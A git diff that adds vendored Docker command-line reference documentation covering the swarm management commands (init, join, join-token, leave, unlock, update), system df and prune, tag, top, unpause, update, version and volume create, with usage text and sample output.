diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_init.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_init.md new file mode 100644 index 0000000000..44afc27476 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_init.md @@ -0,0 +1,142 @@ +--- +title: "swarm init" +description: "The swarm init command description and usage" +keywords: "swarm, init" +--- + + + +# swarm init + +```markdown +Usage: docker swarm init [OPTIONS] + +Initialize a swarm + +Options: + --advertise-addr string Advertised address (format: [:port]) + --autolock Enable manager autolocking (requiring an unlock key to start a stopped manager) + --cert-expiry duration Validity period for node certificates (ns|us|ms|s|m|h) (default 2160h0m0s) + --dispatcher-heartbeat duration Dispatcher heartbeat period (ns|us|ms|s|m|h) (default 5s) + --external-ca external-ca Specifications of one or more certificate signing endpoints + --force-new-cluster Force create a new cluster from current state + --help Print usage + --listen-addr node-addr Listen address (format: [:port]) (default 0.0.0.0:2377) + --max-snapshots uint Number of additional Raft snapshots to retain + --snapshot-interval uint Number of log entries between Raft snapshots (default 10000) + --task-history-limit int Task history retention limit (default 5) +``` + +Initialize a swarm. The docker engine targeted by this command becomes a manager +in the newly created single-node swarm. + + +```bash +$ docker swarm init --advertise-addr 192.168.99.121 +Swarm initialized: current node (bvz81updecsj6wjz393c09vti) is now a manager. + +To add a worker to this swarm, run the following command: + + docker swarm join \ + --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx \ + 172.17.0.2:2377 + +To add a manager to this swarm, run 'docker swarm join-token manager' and follow the instructions. 
+```
+
+`docker swarm init` generates two random tokens, a worker token and a manager token. When you join
+a new node to the swarm, the node joins as a worker or manager node based upon the token you pass
+to [swarm join](swarm_join.md).
+
+After you create the swarm, you can display or rotate the token using
+[swarm join-token](swarm_join_token.md).
+
+### `--autolock`
+
+This flag enables automatic locking of managers with an encryption key. The
+private keys and data stored by all managers will be protected by the
+encryption key printed in the output, and will not be accessible without it.
+Thus, it is very important to store this key in order to activate a manager
+after it restarts. The key can be passed to `docker swarm unlock` to reactivate
+the manager. Autolock can be disabled by running
+`docker swarm update --autolock=false`. After disabling it, the encryption key
+is no longer required to start the manager, and it will start up on its own
+without user intervention.
+
+### `--cert-expiry`
+
+This flag sets the validity period for node certificates.
+
+### `--dispatcher-heartbeat`
+
+This flag sets the period that nodes are told to use to report their health.
+
+### `--external-ca`
+
+This flag sets up the swarm to use an external CA to issue node certificates. The value takes
+the form `protocol=X,url=Y`. The value for `protocol` specifies what protocol should be used
+to send signing requests to the external CA. Currently, the only supported value is `cfssl`.
+The URL specifies the endpoint where signing requests should be submitted.
+
+### `--force-new-cluster`
+
+This flag forces an existing node that was part of a quorum that was lost to restart as a single node Manager without losing its data.
+
+### `--listen-addr`
+
+The node listens for inbound swarm manager traffic on this address. The default is to listen on
+0.0.0.0:2377.
It is also possible to specify a network interface to listen on that interface's
+address; for example `--listen-addr eth0:2377`.
+
+Specifying a port is optional. If the value is a bare IP address or interface
+name, the default port 2377 will be used.
+
+### `--advertise-addr`
+
+This flag specifies the address that will be advertised to other members of the
+swarm for API access and overlay networking. If unspecified, Docker will check
+if the system has a single IP address, and use that IP address with the
+listening port (see `--listen-addr`). If the system has multiple IP addresses,
+`--advertise-addr` must be specified so that the correct address is chosen for
+inter-manager communication and overlay networking.
+
+It is also possible to specify a network interface to advertise that interface's address;
+for example `--advertise-addr eth0:2377`.
+
+Specifying a port is optional. If the value is a bare IP address or interface
+name, the default port 2377 will be used.
+
+### `--task-history-limit`
+
+This flag sets up the task history retention limit.
+
+### `--max-snapshots`
+
+This flag sets the number of old Raft snapshots to retain in addition to the
+current Raft snapshots. By default, no old snapshots are retained. This option
+may be used for debugging, or to store old snapshots of the swarm state for
+disaster recovery purposes.
+
+### `--snapshot-interval`
+
+This flag specifies how many log entries to allow in between Raft snapshots.
+Setting this to a higher number will trigger snapshots less frequently.
+Snapshots compact the Raft log and allow for more efficient transfer of the
+state to new managers. However, there is a performance cost to taking snapshots
+frequently.
+ +## Related information + +* [swarm join](swarm_join.md) +* [swarm leave](swarm_leave.md) +* [swarm update](swarm_update.md) +* [swarm join-token](swarm_join_token.md) +* [node rm](node_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join.md new file mode 100644 index 0000000000..0cde0d7bcd --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join.md @@ -0,0 +1,102 @@ +--- +title: "swarm join" +description: "The swarm join command description and usage" +keywords: "swarm, join" +--- + + + +# swarm join + +```markdown +Usage: docker swarm join [OPTIONS] HOST:PORT + +Join a swarm as a node and/or manager + +Options: + --advertise-addr string Advertised address (format: [:port]) + --help Print usage + --listen-addr node-addr Listen address (format: [:port]) (default 0.0.0.0:2377) + --token string Token for entry into the swarm +``` + +Join a node to a swarm. The node joins as a manager node or worker node based upon the token you +pass with the `--token` flag. If you pass a manager token, the node joins as a manager. If you +pass a worker token, the node joins as a worker. + +### Join a node to swarm as a manager + +The example below demonstrates joining a manager node using a manager token. + +```bash +$ docker swarm join --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2 192.168.99.121:2377 +This node joined a swarm as a manager. +$ docker node ls +ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS +dkp8vy1dq1kxleu9g4u78tlag * manager2 Ready Active Reachable +dvfxp4zseq4s0rih1selh0d20 manager1 Ready Active Leader +``` + +A cluster should only have 3-7 managers at most, because a majority of managers must be available +for the cluster to function. Nodes that aren't meant to participate in this management quorum +should join as workers instead. 
Managers should be stable hosts that have static IP addresses. + +### Join a node to swarm as a worker + +The example below demonstrates joining a worker node using a worker token. + +```bash +$ docker swarm join --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx 192.168.99.121:2377 +This node joined a swarm as a worker. +$ docker node ls +ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS +7ln70fl22uw2dvjn2ft53m3q5 worker2 Ready Active +dkp8vy1dq1kxleu9g4u78tlag worker1 Ready Active Reachable +dvfxp4zseq4s0rih1selh0d20 * manager1 Ready Active Leader +``` + +### `--listen-addr value` + +If the node is a manager, it will listen for inbound swarm manager traffic on this +address. The default is to listen on 0.0.0.0:2377. It is also possible to specify a +network interface to listen on that interface's address; for example `--listen-addr eth0:2377`. + +Specifying a port is optional. If the value is a bare IP address, or interface +name, the default port 2377 will be used. + +This flag is generally not necessary when joining an existing swarm. + +### `--advertise-addr value` + +This flag specifies the address that will be advertised to other members of the +swarm for API access. If unspecified, Docker will check if the system has a +single IP address, and use that IP address with the listening port (see +`--listen-addr`). If the system has multiple IP addresses, `--advertise-addr` +must be specified so that the correct address is chosen for inter-manager +communication and overlay networking. + +It is also possible to specify a network interface to advertise that interface's address; +for example `--advertise-addr eth0:2377`. + +Specifying a port is optional. If the value is a bare IP address, or interface +name, the default port 2377 will be used. + +This flag is generally not necessary when joining an existing swarm. 
+ +### `--token string` + +Secret value required for nodes to join the swarm + + +## Related information + +* [swarm init](swarm_init.md) +* [swarm leave](swarm_leave.md) +* [swarm update](swarm_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join_token.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join_token.md new file mode 100644 index 0000000000..d731f028ba --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join_token.md @@ -0,0 +1,105 @@ +--- +title: "swarm join-token" +description: "The swarm join-token command description and usage" +keywords: "swarm, join-token" +--- + + + +# swarm join-token + +```markdown +Usage: docker swarm join-token [OPTIONS] (worker|manager) + +Manage join tokens + +Options: + --help Print usage + -q, --quiet Only display token + --rotate Rotate join token +``` + +Join tokens are secrets that allow a node to join the swarm. There are two +different join tokens available, one for the worker role and one for the manager +role. You pass the token using the `--token` flag when you run +[swarm join](swarm_join.md). Nodes use the join token only when they join the +swarm. + +You can view or rotate the join tokens using `swarm join-token`. 
+ +As a convenience, you can pass `worker` or `manager` as an argument to +`join-token` to print the full `docker swarm join` command to join a new node to +the swarm: + +```bash +$ docker swarm join-token worker +To add a worker to this swarm, run the following command: + + docker swarm join \ + --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx \ + 172.17.0.2:2377 + +$ docker swarm join-token manager +To add a manager to this swarm, run the following command: + + docker swarm join \ + --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2 \ + 172.17.0.2:2377 +``` + +Use the `--rotate` flag to generate a new join token for the specified role: + +```bash +$ docker swarm join-token --rotate worker +Successfully rotated worker join token. + +To add a worker to this swarm, run the following command: + + docker swarm join \ + --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-b30ljddcqhef9b9v4rs7mel7t \ + 172.17.0.2:2377 +``` + +After using `--rotate`, only the new token will be valid for joining with the specified role. + +The `-q` (or `--quiet`) flag only prints the token: + +```bash +$ docker swarm join-token -q worker + +SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-b30ljddcqhef9b9v4rs7mel7t +``` + +### `--rotate` + +Because tokens allow new nodes to join the swarm, you should keep them secret. +Be particularly careful with manager tokens since they allow new manager nodes +to join the swarm. A rogue manager has the potential to disrupt the operation of +your swarm. + +Rotate your swarm's join token if a token gets checked-in to version control, +stolen, or a node is compromised. You may also want to periodically rotate the +token to ensure any unknown token leaks do not allow a rogue node to join +the swarm. + +To rotate the join token and print the newly generated token, run +`docker swarm join-token --rotate` and pass the role: `manager` or `worker`. 
+ +Rotating a join-token means that no new nodes will be able to join the swarm +using the old token. Rotation does not affect existing nodes in the swarm +because the join token is only used for authorizing new nodes joining the swarm. + +### `--quiet` + +Only print the token. Do not print a complete command for joining. + +## Related information + +* [swarm join](swarm_join.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_leave.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_leave.md new file mode 100644 index 0000000000..c0d9437818 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_leave.md @@ -0,0 +1,58 @@ +--- +title: "swarm leave" +description: "The swarm leave command description and usage" +keywords: "swarm, leave" +--- + + + +# swarm leave + +```markdown +Usage: docker swarm leave [OPTIONS] + +Leave the swarm + +Options: + -f, --force Force this node to leave the swarm, ignoring warnings + --help Print usage +``` + +When you run this command on a worker, that worker leaves the swarm. + +You can use the `--force` option on a manager to remove it from the swarm. +However, this does not reconfigure the swarm to ensure that there are enough +managers to maintain a quorum in the swarm. The safe way to remove a manager +from a swarm is to demote it to a worker and then direct it to leave the quorum +without using `--force`. Only use `--force` in situations where the swarm will +no longer be used after the manager leaves, such as in a single-node swarm. 
+ +Consider the following swarm, as seen from the manager: +```bash +$ docker node ls +ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS +7ln70fl22uw2dvjn2ft53m3q5 worker2 Ready Active +dkp8vy1dq1kxleu9g4u78tlag worker1 Ready Active +dvfxp4zseq4s0rih1selh0d20 * manager1 Ready Active Leader +``` + +To remove `worker2`, issue the following command from `worker2` itself: +```bash +$ docker swarm leave +Node left the default swarm. +``` +To remove an inactive node, use the [`node rm`](node_rm.md) command instead. + +## Related information + +* [node rm](node_rm.md) +* [swarm init](swarm_init.md) +* [swarm join](swarm_join.md) +* [swarm update](swarm_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock.md new file mode 100644 index 0000000000..164b7d35a4 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock.md @@ -0,0 +1,41 @@ +--- +title: "swarm unlock" +description: "The swarm unlock command description and usage" +keywords: "swarm, unlock" +--- + + + +# swarm unlock + +```markdown +Usage: docker swarm unlock + +Unlock swarm + +Options: + --help Print usage +``` + +Unlocks a locked manager using a user-supplied unlock key. This command must be +used to reactivate a manager after its Docker daemon restarts if the autolock +setting is turned on. The unlock key is printed at the time when autolock is +enabled, and is also available from the `docker swarm unlock-key` command. 
+ + +```bash +$ docker swarm unlock +Please enter unlock key: +``` + +## Related information + +* [swarm init](swarm_init.md) +* [swarm update](swarm_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock_key.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock_key.md new file mode 100644 index 0000000000..a2597fe9ab --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock_key.md @@ -0,0 +1,84 @@ +--- +title: "swarm unlock-key" +description: "The swarm unlock-key command description and usage" +keywords: "swarm, unlock-key" +--- + + + +# swarm unlock-key + +```markdown +Usage: docker swarm unlock-key [OPTIONS] + +Manage the unlock key + +Options: + --help Print usage + -q, --quiet Only display token + --rotate Rotate unlock key +``` + +An unlock key is a secret key needed to unlock a manager after its Docker daemon +restarts. These keys are only used when the autolock feature is enabled for the +swarm. + +You can view or rotate the unlock key using `swarm unlock-key`. To view the key, +run the `docker swarm unlock-key` command without any arguments: + + +```bash +$ docker swarm unlock-key +To unlock a swarm manager after it restarts, run the `docker swarm unlock` +command and provide the following key: + + SWMKEY-1-fySn8TY4w5lKcWcJPIpKufejh9hxx5KYwx6XZigx3Q4 + +Please remember to store this key in a password manager, since without it you +will not be able to restart the manager. +``` + +Use the `--rotate` flag to rotate the unlock key to a new, randomly-generated +key: + +```bash +$ docker swarm unlock-key --rotate +Successfully rotated manager unlock key. + +To unlock a swarm manager after it restarts, run the `docker swarm unlock` +command and provide the following key: + + SWMKEY-1-7c37Cc8654o6p38HnroywCi19pllOnGtbdZEgtKxZu8 + +Please remember to store this key in a password manager, since without it you +will not be able to restart the manager. 
+``` + +The `-q` (or `--quiet`) flag only prints the key: + +```bash +$ docker swarm unlock-key -q +SWMKEY-1-7c37Cc8654o6p38HnroywCi19pllOnGtbdZEgtKxZu8 +``` + +### `--rotate` + +This flag rotates the unlock key, replacing it with a new randomly-generated +key. The old unlock key will no longer be accepted. + +### `--quiet` + +Only print the unlock key, without instructions. + +## Related information + +* [swarm unlock](swarm_unlock.md) +* [swarm init](swarm_init.md) +* [swarm update](swarm_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_update.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_update.md new file mode 100644 index 0000000000..0af63fe3e0 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_update.md @@ -0,0 +1,45 @@ +--- +title: "swarm update" +description: "The swarm update command description and usage" +keywords: "swarm, update" +--- + + + +# swarm update + +```markdown +Usage: docker swarm update [OPTIONS] + +Update the swarm + +Options: + --autolock Change manager autolocking setting (true|false) + --cert-expiry duration Validity period for node certificates (ns|us|ms|s|m|h) (default 2160h0m0s) + --dispatcher-heartbeat duration Dispatcher heartbeat period (ns|us|ms|s|m|h) (default 5s) + --external-ca external-ca Specifications of one or more certificate signing endpoints + --help Print usage + --max-snapshots uint Number of additional Raft snapshots to retain + --snapshot-interval uint Number of log entries between Raft snapshots (default 10000) + --task-history-limit int Task history retention limit (default 5) +``` + +Updates a swarm with new parameter values. This command must target a manager node. 
+ + +```bash +$ docker swarm update --cert-expiry 720h +``` + +## Related information + +* [swarm init](swarm_init.md) +* [swarm join](swarm_join.md) +* [swarm leave](swarm_leave.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/system_df.md b/vendor/github.com/docker/docker/docs/reference/commandline/system_df.md new file mode 100644 index 0000000000..c6e8bbdc68 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/system_df.md @@ -0,0 +1,76 @@ +--- +title: "system df" +description: "The system df command description and usage" +keywords: "system, data, usage, disk" +--- + + + +# system df + +```markdown +Usage: docker system df [OPTIONS] + +Show docker filesystem usage + +Options: + --help Print usage + -v, --verbose Show detailed information on space usage +``` + +The `docker system df` command displays information regarding the +amount of disk space used by the docker daemon. + +By default the command will just show a summary of the data used: +```bash +$ docker system df +TYPE TOTAL ACTIVE SIZE RECLAIMABLE +Images 5 2 16.43 MB 11.63 MB (70%) +Containers 2 0 212 B 212 B (100%) +Local Volumes 2 1 36 B 0 B (0%) +``` + +A more detailed view can be requested using the `-v, --verbose` flag: +```bash +$ docker system df -v +Images space usage: + +REPOSITORY TAG IMAGE ID CREATED SIZE SHARED SIZE UNIQUE SIZE CONTAINERS +my-curl latest b2789dd875bf 6 minutes ago 11 MB 11 MB 5 B 0 +my-jq latest ae67841be6d0 6 minutes ago 9.623 MB 8.991 MB 632.1 kB 0 + a0971c4015c1 6 minutes ago 11 MB 11 MB 0 B 0 +alpine latest 4e38e38c8ce0 9 weeks ago 4.799 MB 0 B 4.799 MB 1 +alpine 3.3 47cf20d8c26c 9 weeks ago 4.797 MB 4.797 MB 0 B 1 + +Containers space usage: + +CONTAINER ID IMAGE COMMAND LOCAL VOLUMES SIZE CREATED STATUS NAMES +4a7f7eebae0f alpine:latest "sh" 1 0 B 16 minutes ago Exited (0) 5 minutes ago hopeful_yalow +f98f9c2aa1ea alpine:3.3 "sh" 1 212 B 16 minutes ago Exited (0) 48 seconds ago anon-vol + +Local Volumes space usage: 
+ +NAME LINKS SIZE +07c7bdf3e34ab76d921894c2b834f073721fccfbbcba792aa7648e3a7a664c2e 2 36 B +my-named-vol 0 0 B +``` + +* `SHARED SIZE` is the amount of space that an image shares with another one (i.e. their common data) +* `UNIQUE SIZE` is the amount of space that is only used by a given image +* `SIZE` is the virtual size of the image, it is the sum of `SHARED SIZE` and `UNIQUE SIZE` + +Note that network information is not shown because it doesn't consume the disk space. + +## Related Information +* [system prune](system_prune.md) +* [container prune](container_prune.md) +* [volume prune](volume_prune.md) +* [image prune](image_prune.md) +* [network prune](network_prune.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/system_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/system_prune.md new file mode 100644 index 0000000000..46f8c4364a --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/system_prune.md @@ -0,0 +1,79 @@ +--- +title: "system prune" +description: "Remove unused data" +keywords: "system, prune, delete, remove" +--- + + + +# system prune + +```markdown +Usage: docker system prune [OPTIONS] + +Delete unused data + +Options: + -a, --all Remove all unused data not just dangling ones + -f, --force Do not prompt for confirmation + --help Print usage +``` + +Remove all unused containers, volumes, networks and images (both dangling and unreferenced). + +Example output: + +```bash +$ docker system prune -a +WARNING! This will remove: + - all stopped containers + - all volumes not used by at least one container + - all networks not used by at least one container + - all images without at least one container associated to them +Are you sure you want to continue? 
[y/N] y +Deleted Containers: +0998aa37185a1a7036b0e12cf1ac1b6442dcfa30a5c9650a42ed5010046f195b +73958bfb884fa81fa4cc6baf61055667e940ea2357b4036acbbe25a60f442a4d + +Deleted Volumes: +named-vol + +Deleted Images: +untagged: my-curl:latest +deleted: sha256:7d88582121f2a29031d92017754d62a0d1a215c97e8f0106c586546e7404447d +deleted: sha256:dd14a93d83593d4024152f85d7c63f76aaa4e73e228377ba1d130ef5149f4d8b +untagged: alpine:3.3 +deleted: sha256:695f3d04125db3266d4ab7bbb3c6b23aa4293923e762aa2562c54f49a28f009f +untagged: alpine:latest +deleted: sha256:ee4603260daafe1a8c2f3b78fd760922918ab2441cbb2853ed5c439e59c52f96 +deleted: sha256:9007f5987db353ec398a223bc5a135c5a9601798ba20a1abba537ea2f8ac765f +deleted: sha256:71fa90c8f04769c9721459d5aa0936db640b92c8c91c9b589b54abd412d120ab +deleted: sha256:bb1c3357b3c30ece26e6604aea7d2ec0ace4166ff34c3616701279c22444c0f3 +untagged: my-jq:latest +deleted: sha256:6e66d724542af9bc4c4abf4a909791d7260b6d0110d8e220708b09e4ee1322e1 +deleted: sha256:07b3fa89d4b17009eb3988dfc592c7d30ab3ba52d2007832dffcf6d40e3eda7f +deleted: sha256:3a88a5c81eb5c283e72db2dbc6d65cbfd8e80b6c89bb6e714cfaaa0eed99c548 + +Total reclaimed space: 13.5 MB +``` + +## Related information + +* [volume create](volume_create.md) +* [volume ls](volume_ls.md) +* [volume inspect](volume_inspect.md) +* [volume rm](volume_rm.md) +* [volume prune](volume_prune.md) +* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/) +* [system df](system_df.md) +* [container prune](container_prune.md) +* [image prune](image_prune.md) +* [network prune](network_prune.md) +* [system prune](system_prune.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/tag.md b/vendor/github.com/docker/docker/docs/reference/commandline/tag.md new file mode 100644 index 0000000000..983bfe27b2 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/tag.md @@ -0,0 +1,74 @@ +--- +title: "tag" +description: "The tag command description and usage" 
+keywords: "tag, name, image" +--- + + + +# tag + +```markdown +Usage: docker tag SOURCE_IMAGE[:TAG] TARGET_IMAGE[:TAG] + +Create a tag TARGET_IMAGE that refers to SOURCE_IMAGE + +Options: + --help Print usage +``` + +An image name is made up of slash-separated name components, optionally prefixed +by a registry hostname. The hostname must comply with standard DNS rules, but +may not contain underscores. If a hostname is present, it may optionally be +followed by a port number in the format `:8080`. If not present, the command +uses Docker's public registry located at `registry-1.docker.io` by default. Name +components may contain lowercase characters, digits and separators. A separator +is defined as a period, one or two underscores, or one or more dashes. A name +component may not start or end with a separator. + +A tag name may contain lowercase and uppercase characters, digits, underscores, +periods and dashes. A tag name may not start with a period or a dash and may +contain a maximum of 128 characters. + +You can group your images together using names and tags, and then upload them +to [*Share Images via Repositories*](https://docs.docker.com/engine/tutorials/dockerrepos/#/contributing-to-docker-hub). + +# Examples + +## Tagging an image referenced by ID + +To tag a local image with ID "0e5574283393" into the "fedora" repository with +"version1.0": + + docker tag 0e5574283393 fedora/httpd:version1.0 + +## Tagging an image referenced by Name + +To tag a local image with name "httpd" into the "fedora" repository with +"version1.0": + + docker tag httpd fedora/httpd:version1.0 + +Note that since the tag name is not specified, the alias is created for an +existing local version `httpd:latest`. 
+ +## Tagging an image referenced by Name and Tag + +To tag a local image with name "httpd" and tag "test" into the "fedora" +repository with "version1.0.test": + + docker tag httpd:test fedora/httpd:version1.0.test + +## Tagging an image for a private repository + +To push an image to a private registry and not the central Docker +registry you must tag it with the registry hostname and port (if needed). + + docker tag 0e5574283393 myregistryhost:5000/fedora/httpd:version1.0 diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/top.md b/vendor/github.com/docker/docker/docs/reference/commandline/top.md new file mode 100644 index 0000000000..0a04828775 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/top.md @@ -0,0 +1,25 @@ +--- +title: "top" +description: "The top command description and usage" +keywords: "container, running, processes" +--- + + + +# top + +```markdown +Usage: docker top CONTAINER [ps OPTIONS] + +Display the running processes of a container + +Options: + --help Print usage +``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/unpause.md b/vendor/github.com/docker/docker/docs/reference/commandline/unpause.md new file mode 100644 index 0000000000..aa2326fefc --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/unpause.md @@ -0,0 +1,36 @@ +--- +title: "unpause" +description: "The unpause command description and usage" +keywords: "cgroups, suspend, container" +--- + + + +# unpause + +```markdown +Usage: docker unpause CONTAINER [CONTAINER...] + +Unpause all processes within one or more containers + +Options: + --help Print usage +``` + +The `docker unpause` command un-suspends all processes in the specified containers. +On Linux, it does this using the cgroups freezer. + +See the +[cgroups freezer documentation](https://www.kernel.org/doc/Documentation/cgroup-v1/freezer-subsystem.txt) +for further details. 
+ +## Related information + +* [pause](pause.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/update.md b/vendor/github.com/docker/docker/docs/reference/commandline/update.md new file mode 100644 index 0000000000..a13900440f --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/update.md @@ -0,0 +1,120 @@ +--- +title: "update" +description: "The update command description and usage" +keywords: "resources, update, dynamically" +--- + + + +## update + +```markdown +Usage: docker update [OPTIONS] CONTAINER [CONTAINER...] + +Update configuration of one or more containers + +Options: + --blkio-weight value Block IO (relative weight), between 10 and 1000 + --cpu-period int Limit CPU CFS (Completely Fair Scheduler) period + --cpu-quota int Limit CPU CFS (Completely Fair Scheduler) quota + -c, --cpu-shares int CPU shares (relative weight) + --cpu-rt-period int Limit the CPU real-time period in microseconds + --cpu-rt-runtime int Limit the CPU real-time runtime in microseconds + --cpuset-cpus string CPUs in which to allow execution (0-3, 0,1) + --cpuset-mems string MEMs in which to allow execution (0-3, 0,1) + --help Print usage + --kernel-memory string Kernel memory limit + -m, --memory string Memory limit + --memory-reservation string Memory soft limit + --memory-swap string Swap limit equal to memory plus swap: '-1' to enable unlimited swap + --restart string Restart policy to apply when a container exits +``` + +The `docker update` command dynamically updates container configuration. +You can use this command to prevent containers from consuming too many +resources from their Docker host. With a single command, you can place +limits on a single container or on many. To specify more than one container, +provide space-separated list of container names or IDs. + +With the exception of the `--kernel-memory` option, you can specify these +options on a running or a stopped container. 
On kernel version older than +4.6, you can only update `--kernel-memory` on a stopped container or on +a running container with kernel memory initialized. + +## Examples + +The following sections illustrate ways to use this command. + +### Update a container's cpu-shares + +To limit a container's cpu-shares to 512, first identify the container +name or ID. You can use `docker ps` to find these values. You can also +use the ID returned from the `docker run` command. Then, do the following: + +```bash +$ docker update --cpu-shares 512 abebf7571666 +``` + +### Update a container with cpu-shares and memory + +To update multiple resource configurations for multiple containers: + +```bash +$ docker update --cpu-shares 512 -m 300M abebf7571666 hopeful_morse +``` + +### Update a container's kernel memory constraints + +You can update a container's kernel memory limit using the `--kernel-memory` +option. On kernel version older than 4.6, this option can be updated on a +running container only if the container was started with `--kernel-memory`. +If the container was started *without* `--kernel-memory` you need to stop +the container before updating kernel memory. + +For example, if you started a container with this command: + +```bash +$ docker run -dit --name test --kernel-memory 50M ubuntu bash +``` + +You can update kernel memory while the container is running: + +```bash +$ docker update --kernel-memory 80M test +``` + +If you started a container *without* kernel memory initialized: + +```bash +$ docker run -dit --name test2 --memory 300M ubuntu bash +``` + +Update kernel memory of running container `test2` will fail. You need to stop +the container before updating the `--kernel-memory` setting. The next time you +start it, the container uses the new value. + +Kernel version newer than (include) 4.6 does not have this limitation, you +can use `--kernel-memory` the same way as other options. 
+ +### Update a container's restart policy + +You can change a container's restart policy on a running container. The new +restart policy takes effect instantly after you run `docker update` on a +container. + +To update restart policy for one or more containers: + +```bash +$ docker update --restart=on-failure:3 abebf7571666 hopeful_morse +``` + +Note that if the container is started with "--rm" flag, you cannot update the restart +policy for it. The `AutoRemove` and `RestartPolicy` are mutually exclusive for the +container. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/version.md b/vendor/github.com/docker/docker/docs/reference/commandline/version.md new file mode 100644 index 0000000000..cb1bcee5b3 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/version.md @@ -0,0 +1,67 @@ +--- +title: "version" +description: "The version command description and usage" +keywords: "version, architecture, api" +--- + + + +# version + +```markdown +Usage: docker version [OPTIONS] + +Show the Docker version information + +Options: + -f, --format string Format the output using the given Go template + --help Print usage +``` + +By default, this will render all version information in an easy to read +layout. If a format is specified, the given template will be executed instead. + +Go's [text/template](http://golang.org/pkg/text/template/) package +describes all the details of the format. 
+ +## Examples + +**Default output:** + + $ docker version + Client: + Version: 1.8.0 + API version: 1.20 + Go version: go1.4.2 + Git commit: f5bae0a + Built: Tue Jun 23 17:56:00 UTC 2015 + OS/Arch: linux/amd64 + + Server: + Version: 1.8.0 + API version: 1.20 + Go version: go1.4.2 + Git commit: f5bae0a + Built: Tue Jun 23 17:56:00 UTC 2015 + OS/Arch: linux/amd64 + +**Get server version:** + + {% raw %} + $ docker version --format '{{.Server.Version}}' + 1.8.0 + {% endraw %} + +**Dump raw data:** + + {% raw %} + $ docker version --format '{{json .}}' + {"Client":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"amd64","BuildTime":"Tue Jun 23 17:56:00 UTC 2015"},"ServerOK":true,"Server":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"amd64","KernelVersion":"3.13.2-gentoo","BuildTime":"Tue Jun 23 17:56:00 UTC 2015"}} + {% endraw %} diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_create.md new file mode 100644 index 0000000000..9b188a9500 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/volume_create.md @@ -0,0 +1,91 @@ +--- +title: "volume create" +description: "The volume create command description and usage" +keywords: "volume, create" +--- + + + +# volume create + +```markdown +Usage: docker volume create [OPTIONS] [VOLUME] + +Create a volume + +Options: + -d, --driver string Specify volume driver name (default "local") + --help Print usage + --label value Set metadata for a volume (default []) + -o, --opt value Set driver specific options (default map[]) +``` + +Creates a new volume that containers can consume and store data in. If a name is not specified, Docker generates a random name. 
